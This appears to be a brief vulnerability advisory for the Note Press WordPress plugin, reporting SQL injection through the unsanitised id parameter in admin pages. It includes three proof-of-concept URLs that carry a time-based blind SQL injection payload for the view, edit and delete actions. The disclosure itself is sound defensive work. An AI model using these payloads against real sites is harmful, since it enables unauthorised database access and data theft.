The plugin does not sanitise and escape the id parameter before using it in various SQL statement via the admin dashboard, leading to SQL Injections
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action;=view&id;=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt) https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action;=edit&id;=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt) https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action;=delete&id;=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
CPE | Name | Operator | Version |
---|---|---|---|
note-press | eq | * |